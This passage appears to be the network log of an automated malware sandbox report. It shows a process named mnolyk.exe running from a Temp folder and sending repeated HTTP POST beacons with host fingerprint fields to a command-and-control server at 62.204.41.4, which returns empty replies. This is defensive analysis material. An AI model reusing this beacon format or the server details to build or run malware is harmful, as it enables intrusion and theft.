                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      458192.168.2.75018662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:02.145296097 CET918OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:02.211823940 CET918INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      459192.168.2.75018762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:02.390913010 CET919OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:02.453962088 CET919INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      46192.168.2.74977062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:08.800627947 CET478OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:08.866245985 CET478INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      460192.168.2.75018862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:02.626277924 CET920OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:02.690078020 CET920INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      461192.168.2.75018962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:02.860152006 CET921OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:02.926038027 CET921INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      462192.168.2.75019062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:03.117137909 CET922OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:03.186362982 CET922INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      463192.168.2.75019162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:03.374136925 CET923OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:03.439101934 CET923INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      464192.168.2.75019262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:03.610611916 CET924OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:03.675545931 CET924INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      465192.168.2.75019362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:03.846257925 CET925OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:03.912359953 CET925INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      466192.168.2.75019462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:04.099905968 CET926OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:04.165308952 CET926INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      467192.168.2.75019562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:04.351511002 CET927OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:04.417937040 CET927INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      468192.168.2.75019662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:04.592802048 CET928OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:04.661218882 CET928INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      469192.168.2.75019762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:04.844993114 CET929OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:04.909439087 CET929INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      47192.168.2.74977162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:09.033958912 CET479OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:09.099214077 CET479INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      470192.168.2.75019862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:05.080347061 CET930OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:05.149249077 CET930INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      471192.168.2.75019962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:05.327038050 CET931OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:05.389956951 CET931INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      472192.168.2.75020062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:05.567461967 CET932OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:05.634252071 CET932INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      473192.168.2.75020162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:05.815510988 CET933OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:05.880518913 CET933INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      474192.168.2.75020262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:06.231570005 CET934OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:06.299165010 CET934INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      475192.168.2.75020362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:06.492873907 CET935OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
